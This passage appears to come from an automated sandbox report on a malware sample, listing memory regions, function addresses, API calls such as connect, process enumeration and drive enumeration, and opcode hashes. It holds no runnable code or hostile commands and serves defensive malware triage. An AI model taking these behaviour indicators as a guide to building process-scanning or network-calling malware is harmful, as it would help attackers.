                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID: FD %s:%d sclose(%d)
                                    • API String ID: 2781271927-3116021458
                                    • Opcode ID: 98f14c4ca2b118b3cfbdbc66cea0865b69db0c8f6588752e2d97e557cbdb0cec
                                    • Instruction ID: ba3e31271b6ea037981d77985fe6f927ba0ac8e6d6fc0635a970e88f54e75a8c
                                    • Opcode Fuzzy Hash: 98f14c4ca2b118b3cfbdbc66cea0865b69db0c8f6588752e2d97e557cbdb0cec
                                    • Instruction Fuzzy Hash: C3D05E32A192212B852069696C48C9B6BA8DEC6F60B450D6AF940A7311E2349C1197E2
                                    Function 0039B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0039B29E,?,00000000,?,?), ref: 0039B0BA
                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00383C41,00000000), ref: 0039B0C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: ErrorLastconnect
                                    • String ID:
                                    • API String ID: 374722065-0
                                    • Opcode ID: f76f6ec3693da15dafa6306d36abf92993cd7456eba9df28a6c61829b817bfc5
                                    • Instruction ID: f32697ff36675e3f4a1a62a3df1a5fb2bc1a05127f33a3ee3a6337ddf7f4a8e5
                                    • Opcode Fuzzy Hash: f76f6ec3693da15dafa6306d36abf92993cd7456eba9df28a6c61829b817bfc5
                                    • Instruction Fuzzy Hash: 1C0124323042019BCE215A79A984EABF399FF88774F050B24F978932E0D726ED108752
                                    Function 070F017A Relevance: 2.2, APIs: 1, Instructions: 719COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 6e79bda67cb5aba5c95a580283cc5f64aaeeecfe6590e5a44e8557390c97e915
                                    • Instruction ID: cbf50ccc601aa13c5c67e42153353cd53627e337abbd2589a8612eefbdee4508
                                    • Opcode Fuzzy Hash: 6e79bda67cb5aba5c95a580283cc5f64aaeeecfe6590e5a44e8557390c97e915
                                    • Instruction Fuzzy Hash: 33E1EFFB25C121BDB142C1856F54AFEA76EE2C7730B30862BFA17D6903E3944E4A1171
                                    Function 070F01F6 Relevance: 2.2, APIs: 1, Instructions: 714COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9182f7f4ec13c0af0bd4c821e74ab78b6dd6b1e04dfa2621f344529602324e14
                                    • Instruction ID: a899c8d91938f630a889271abb47c78c13e935a56313d659d1138369bc119511
                                    • Opcode Fuzzy Hash: 9182f7f4ec13c0af0bd4c821e74ab78b6dd6b1e04dfa2621f344529602324e14
                                    • Instruction Fuzzy Hash: 21E1DFFB26C121BDB142C1856F54AFF676EE2C7730B30862BFA17D6903E3944A4A1571
                                    Function 070F0170 Relevance: 2.2, APIs: 1, Instructions: 708COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 43c55ed13fd3b2c3f86ca0cc6455f7d8935604481ea1e6f630063a1fddf29e0a
                                    • Instruction ID: 6c3237fb3bd3a72b2d47e1fdb328171e18be429adc335edf5609f63d8208642a
                                    • Opcode Fuzzy Hash: 43c55ed13fd3b2c3f86ca0cc6455f7d8935604481ea1e6f630063a1fddf29e0a
                                    • Instruction Fuzzy Hash: 42E1BEFB26C121BDB142C1856F54AFE676EE2D7730B30862BFA17D6A03E3944E4A1531
                                    Function 070F01AB Relevance: 2.2, APIs: 1, Instructions: 706COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c030a48243be693c2a36d3d9e6be6f38c0a1f75d9e2be26c29694f1b070813ad
                                    • Instruction ID: df981d61d13261ac1b1dc62d0bd265567dadb3e074d3ec795faf05d88ca5f3b3
                                    • Opcode Fuzzy Hash: c030a48243be693c2a36d3d9e6be6f38c0a1f75d9e2be26c29694f1b070813ad
                                    • Instruction Fuzzy Hash: 55E1DEFB26C121BDB142C1816F64AFE676EE6C7730B30862BFA17D6903E3944E4A5531
                                    Function 070F0152 Relevance: 2.2, APIs: 1, Instructions: 705COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 748b7eeff3bc9c61aebc4f3ad373eba5851dc18a054000180556beddf1a787cc
                                    • Instruction ID: d71fd6c69b8c263a4bd15e3bd9a704ec6ccd1b0ced30666f057e53a84b332b71
                                    • Opcode Fuzzy Hash: 748b7eeff3bc9c61aebc4f3ad373eba5851dc18a054000180556beddf1a787cc
                                    • Instruction Fuzzy Hash: DEE1DEFB26C121BDB142C1856F64AFF676DE2D7730B30862BFA17D6903E3944A4A1531
                                    Function 070F0228 Relevance: 2.2, APIs: 1, Instructions: 683COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22591994655fc5b8ca183a1f27dff937ff867f3a0b4515bbf19f0bbdbef6e565
                                    • Instruction ID: 74a8e68e636f9c51d0cdd6aed6c0ccc5c96bb60695b9f05efa5c9812d09aeb93
                                    • Opcode Fuzzy Hash: 22591994655fc5b8ca183a1f27dff937ff867f3a0b4515bbf19f0bbdbef6e565
                                    • Instruction Fuzzy Hash: 76D1BDFB26C121BDB142C1856F64AFE676EE2D7730B30862BFA17D6903E3944E4A1531
                                    Function 070F020D Relevance: 2.2, APIs: 1, Instructions: 674COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: ea8d98fa2d9d41716d213b0ff1db5f132996b015509098a04931e4360937fb45
                                    • Instruction ID: 4239de06b09817eccb32782c3cc00a98e1c1def013f5422c14745c13db297b82
                                    • Opcode Fuzzy Hash: ea8d98fa2d9d41716d213b0ff1db5f132996b015509098a04931e4360937fb45
                                    • Instruction Fuzzy Hash: A5D1ADFB26C121BDB142C1856F64AFE676EE2D7730B30862AFA17D6903E3944A4A1531
                                    Function 070F0252 Relevance: 2.2, APIs: 1, Instructions: 668COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 80fc8b9aa3f6ff7631a935adf65194b57e5d15ee66274b186d25cbd40270fec0
                                    • Instruction ID: c3b2bb72c19a8d162d232cde9e463e1cba2d215f847afdd7b327dc56246d0f50
                                    • Opcode Fuzzy Hash: 80fc8b9aa3f6ff7631a935adf65194b57e5d15ee66274b186d25cbd40270fec0
                                    • Instruction Fuzzy Hash: 5BD1CDFB26C121BDB142C1856F64AFFA76EE2D7730B30862BF617D6903E3944A4A1531
                                    Function 070F027F Relevance: 2.2, APIs: 1, Instructions: 650COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: a9c63ce8da1f81d3b14d81ee9c3de1bdcf49cefb444b6783fcdb356efd86ca2b
                                    • Instruction ID: d2fa11cb5eb16c29f3f13b2954f3a4a90f32df18350b4b35e02c4799f340f345
                                    • Opcode Fuzzy Hash: a9c63ce8da1f81d3b14d81ee9c3de1bdcf49cefb444b6783fcdb356efd86ca2b
                                    • Instruction Fuzzy Hash: 4CD1ACFB26C121BDB142C1856F64AFF676DE2C7730B30862BFA17D6903E3944A4A5531
                                    Function 070F02BE Relevance: 2.1, APIs: 1, Instructions: 636COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 464b0573de564cd7e5a035ea4e8290f688df5528cc5b463a2689f9dfbfba7bc3
                                    • Instruction ID: 502dbf999d20407eb0265311c0120e9706e282bd272c7a4d4ad88a174b789dc0
                                    • Opcode Fuzzy Hash: 464b0573de564cd7e5a035ea4e8290f688df5528cc5b463a2689f9dfbfba7bc3
                                    • Instruction Fuzzy Hash: 3BD1BDFB25C121BDB142C1856F64AFFAB6EE2C7730B30862BF617D6903E2944A4A1571
                                    Function 070F02E9 Relevance: 2.1, APIs: 1, Instructions: 632COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 6e54b923ac1b77ca07daed3c7744d901f59755fd47d3f4fb98e32d39901789d1
                                    • Instruction ID: 7b8790e2d9f033dfccdd89b09862902b8540d90bba3c235455bd5c2192923370
                                    • Opcode Fuzzy Hash: 6e54b923ac1b77ca07daed3c7744d901f59755fd47d3f4fb98e32d39901789d1
                                    • Instruction Fuzzy Hash: B4D1BDFB26C121BDB142C1852F64AFF676EE2C7730B30862BF617D6D03E2944A4A1571
                                    Function 070F0309 Relevance: 2.1, APIs: 1, Instructions: 613COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 692f612ba14eb0fdce043e606194666f0f18c05db027177a657efab7c0878014
                                    • Instruction ID: 58f11fab8101144eab94b90d8ac545d0b46433692912eef61c47c75643fcfee2
                                    • Opcode Fuzzy Hash: 692f612ba14eb0fdce043e606194666f0f18c05db027177a657efab7c0878014
                                    • Instruction Fuzzy Hash: ACC1BEFB25C221BDB142C1852F54AFEA76DE2C7730B30862BFA17D6903E2944A4A1571
                                    Function 070F0355 Relevance: 2.1, APIs: 1, Instructions: 611COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: bb82ae085e464ef1e9c411b233f2ad77d0b5f5b9617bd02f8d19019dd5c837cd
                                    • Instruction ID: 9655bc7d9f18c36f41ff44619ec34cf055ab73acd4de0bfbbacf7706bf6c4c81
                                    • Opcode Fuzzy Hash: bb82ae085e464ef1e9c411b233f2ad77d0b5f5b9617bd02f8d19019dd5c837cd
                                    • Instruction Fuzzy Hash: DEC1BEFB25C121BDB142C1856F54AFF676EE2C7730B30862BFA17D6D03E2944A4A1571
                                    Function 070F0338 Relevance: 2.1, APIs: 1, Instructions: 602COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 83e484225fc05c79740a0a6c1bf47a032d07b28350b892f8f756b4d2031e6f23
                                    • Instruction ID: 2827bfc8a0fb9c5061b3b2a174af5304776b9b3d9124e4963abdb1216179d840
                                    • Opcode Fuzzy Hash: 83e484225fc05c79740a0a6c1bf47a032d07b28350b892f8f756b4d2031e6f23
                                    • Instruction Fuzzy Hash: DDC1BDFB25C121BDB142C1852F54AFFA76EE6C7730B30862BF617D6D03E2944A4A1571
                                    Function 070F036F Relevance: 2.1, APIs: 1, Instructions: 590COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 700f372b49ff728be45a1abded0b9ad38709831dfe9c92cd0bac5d2a4eef3376
                                    • Instruction ID: 4d60b8ceea87c08bd25a3334a736b1273278d0cd13180c2884c26c1c83e866be
                                    • Opcode Fuzzy Hash: 700f372b49ff728be45a1abded0b9ad38709831dfe9c92cd0bac5d2a4eef3376
                                    • Instruction Fuzzy Hash: A5C1BFFB26C221BDB142C1852F54AFFA76DE6C7730B30862BFA17D6D03E2944A4A1571
                                    Function 070F038D Relevance: 2.1, APIs: 1, Instructions: 585COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 79c4c073a8b315a4e8fa95f2b39533ba967436fc311ef1ade945c255d0a497c5
                                    • Instruction ID: 89e4ca083fdfa007ced0e60f8cba3bbaae3f0346a9ce641a221c65b15155eb86
                                    • Opcode Fuzzy Hash: 79c4c073a8b315a4e8fa95f2b39533ba967436fc311ef1ade945c255d0a497c5
                                    • Instruction Fuzzy Hash: C4C1ADFB26C121BDB142C5852F54AFFA76EE2C7730B30862BF617D6D03E2944A4A1571
                                    Function 070F03EF Relevance: 2.0, APIs: 1, Instructions: 546COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 792b345aa139d0f39037571a025884ef77173ce275b96b759b2d58029ddb4c32
                                    • Instruction ID: b476be4f62020cd66773818d02631bad4a8f56b28674527dc9ffc69139db2f9e
                                    • Opcode Fuzzy Hash: 792b345aa139d0f39037571a025884ef77173ce275b96b759b2d58029ddb4c32
                                    • Instruction Fuzzy Hash: EEB1DEFB26C121BDB102C1856F64AFFA76EE2D7730B308627FA17D6903E2944A4A1531
                                    Function 070F045E Relevance: 2.0, APIs: 1, Instructions: 545COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: bfafdaed0e2697a51e9462b19ccc9d1cabaf371b235212588cf3b36b194fc632
                                    • Instruction ID: 6476aa42e53eb69c3f44f4e8d42fe65955dcf95ce7a32405cdc980efc2f0b0c8
                                    • Opcode Fuzzy Hash: bfafdaed0e2697a51e9462b19ccc9d1cabaf371b235212588cf3b36b194fc632
                                    • Instruction Fuzzy Hash: 3CB1DDFB26D121BDB142C1852F64AFFA76DE2C7730B308A27F617D6D03E2944A4A1571
                                    Function 070F03E2 Relevance: 2.0, APIs: 1, Instructions: 541COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 0a5c5ec3632474528f259369a12c76ea13b958e866b84851f928bfb6d3844ce9
                                    • Instruction ID: 6268aa5dbddadf1ddf31b7987f3aebc7232ce2ad0d1052072ec207c57a11c886
                                    • Opcode Fuzzy Hash: 0a5c5ec3632474528f259369a12c76ea13b958e866b84851f928bfb6d3844ce9
                                    • Instruction Fuzzy Hash: FEB1BDFB26C121BDB142C1852F54AFEA76DE2C7730B308627F627D6D03E3944A4A1571
                                    Function 070F0414 Relevance: 2.0, APIs: 1, Instructions: 532COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 998ebb1c74cbc9485a43d7473a1498c129eecefc6dc0e7d9be2d23748f65f8dd
                                    • Instruction ID: 582be8d7588f796696f329c4407e888b3abe71b21fe4d9a95340784218c75c3f
                                    • Opcode Fuzzy Hash: 998ebb1c74cbc9485a43d7473a1498c129eecefc6dc0e7d9be2d23748f65f8dd
                                    • Instruction Fuzzy Hash: 5CB1ADFB26C121BDB142C5852F64AFFA76DE2D7730B308627F627D6D03E2944A4A1531
                                    Function 07100134 Relevance: 1.8, APIs: 1, Instructions: 250COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a78eaf0eb64be64c23e6fe619e98790a4f94c7889dba0d54eb6fd6d06c9f567d
                                    • Instruction ID: 82761eb23b5521ec12e3dd6914b4187aca179e397672de92b21023f7745566d3
                                    • Opcode Fuzzy Hash: a78eaf0eb64be64c23e6fe619e98790a4f94c7889dba0d54eb6fd6d06c9f567d
                                    • Instruction Fuzzy Hash: 5B4191FB16C120BD714B90416B14BFA672EE6DF730B328426F807D96C1E7E44B8950B2
                                    Function 0710012A Relevance: 1.7, APIs: 1, Instructions: 248COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 9b947e9ee563f9133f4320d94f51055a30ea48eea922dfc71002286870ada3a9
                                    • Instruction ID: 80f280107cb7b54f91338170fe46acc53287a01ec6236b422e70765385edcea7
                                    • Opcode Fuzzy Hash: 9b947e9ee563f9133f4320d94f51055a30ea48eea922dfc71002286870ada3a9
                                    • Instruction Fuzzy Hash: 574191FB16C220BD714B84416B14BFA6A2EE6DF730B328426F407D96C1E3E44B8950F2
                                    Function 070A0C27 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: d998935baac9f1329447e8b5ebae3c1dca3121848674bb90bbdb18c6b015a9ce
                                    • Instruction ID: 43dea1ad0610ecfd2756a27b7c41edcaab953efdc27f807c0052ea57750225e8
                                    • Opcode Fuzzy Hash: d998935baac9f1329447e8b5ebae3c1dca3121848674bb90bbdb18c6b015a9ce
                                    • Instruction Fuzzy Hash: 5041B2EB56C229BDB242C2D52B549FF6B6EE5D3330F30863AF417C1502F2954E4A6032
                                    Function 07100228 Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 5a9feb2ac0b61bf1554bc84a2d326539afffecb542933a48bb0b79c61f302597
                                    • Instruction ID: bc5ce03d020ccb0d1d1025af54ae8cd82636cb743f04c826fd859aa525d0d309
                                    • Opcode Fuzzy Hash: 5a9feb2ac0b61bf1554bc84a2d326539afffecb542933a48bb0b79c61f302597
                                    • Instruction Fuzzy Hash: 2F31D6FB02C120BE614B41416B19BFB6B2EE6DF330B328466F407D96C1E3D40B8950B2
                                    Function 070A0C4F Relevance: 1.7, APIs: 1, Instructions: 190COMMON
                                    Download Yara Rule
                                    APIs
